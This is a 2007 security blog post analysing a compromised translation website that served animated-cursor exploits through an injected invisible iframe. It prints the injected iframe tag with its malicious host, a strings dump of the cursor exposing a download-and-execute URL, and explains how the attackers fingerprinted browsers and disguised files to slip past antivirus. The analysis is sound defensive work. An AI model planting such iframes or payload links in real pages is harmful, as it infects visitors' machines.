Didier Stevens

Tuesday 10 April 2007

And This Time, The Vector Is… The Animated Cursor, Again

Filed under: Malware,Vulnerabilities — Didier Stevens @ 8:36

Microsoft Security Bulletin MS05-002 did not patch all vulnerabilities in animated cursors. More than 2 years later, Microsoft had to patch again.

I saw several animated cursors with shell-code last week, here’s an interesting case.

http://www.reverso.net is an online translation website. The site was compromised, criminals inserted this iframe in the main page:

<iframe src=http://www.worldaofwr.net/jw/index.htm width=0 height=0>

An iframe element is like an include statement, the browser will include the source to render the page you’re viewing. Notice that the dimensions of the iframe are zero, it will be invisible. Inserting an iframe pointing to a malicious website is a method of choice for compromising websites.

As of this writing, Reverso has removed the iframe from their website (I did inform them).

Here’s the cleaned up page from the malicious website, referenced by the iframe:

malware.png

The JavaScript in this page will check if you’re using Internet Explorer version 6 or 7, and if you do, it will fingerprint your OS. Are you using Windows 2000, XP or 2003? If you’re using XP, it will use an animated cursor named pay.mid, and if you’re using 2000, it will use another animated cursor named 7517.jpg.

I can see only one reason why the programmer would code this test to send you a cursor, aside from ignorance, and that is to keep a low profile. Because exploiting the animated cursor vulnerability does not crash your browser or generates errors you might notice, the malware programmer could just send you all the cursors he has, and hope that one of them is the right exploit for your machine. But sending several malicious payloads increases the chance that the malware gets detected by an IDS or AV.

In this case, your machine cannot be infected when you’ve disabled scripting. But the programmer could have used server-side scripting in stead of client-side scripting, because your browser sends an User Agent string, which tells the server exactly which browser you’re using and on which OS. Disabling scripting in your browser will not stop server-side scripting.

The animated cursor is downloaded by your browser through a DIV element with a CSS style defining a cursor. Notice that the file extension of the downloaded cursor is .MID or .JPG, not .ANI. Apparently, this is no problem for Internet Explorer, it just assumes the file is an animated cursor. But the malware author has done this to try to stay below your radar. MID is an extension for music files, JPG is an extension for pictures. Many AVs are configured not to scan multimedia files for performance reasons, so the exploit in the cursor might go undetected by using a multimedia file extension. Or if you have blocked ANI files on your proxy, these ones will get through if you allow .MID and .JPG.

Let’s look inside the animated cursor pay.mid, it’s very small, just 801 bytes. A quick way to look inside is to dump the strings, like this: strings pay.mid.

RIFF
ACONanih$
TSIL
TSIL
anihR
01230123012301230123012301230123
444444444444444444444444444
cmd >
/c "
T}      >
QSPPPPPPWP
hurlm
jlhntdl
huser
l$$6
6;|$(u

http://www.worldaofwr.net/jw/soft.exe

And here we see an URL pointing to an executable. You don’t have to be a reverse engineer to understand that the shell-code in this animated cursor will download and execute the executable. And you don’t have to be an IT security expert to know that the downloaded executable is malware.

3 Comments »

  1. Oh, this is a good one. I love how they test the browser version and the OS. So considerate. :P

    Btw, did you say it was patched by Microsoft already, or is this still an open issue?

    Comment by Luke — Tuesday 10 April 2007 @ 17:15

  2. Oh no, it has been patched by the latest (out-of-cycle) security bulletin. I should be more careful in the future and always mention if a patch exists or not.

    Comment by Didier Stevens — Tuesday 10 April 2007 @ 17:34

  3. […] hål den försökte utnyttja finns beskrivet här: http://didierstevens.wordpress.com/2007/04/10/and-this-time-the-vector-is-the-animated-cursor-again/ Date: Jun 18th, 2007 · Comments RSS · Tags: Diverse […]

    Pingback by farligt med spam | Jörgens liv och leverne — Monday 18 June 2007 @ 6:56


RSS feed for comments on this post. TrackBack URI

Leave a Reply (comments are moderated)

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

The Rubric Theme. Blog at WordPress.com.

Follow

Get every new post delivered to your Inbox.

Join 244 other followers

%d bloggers like this: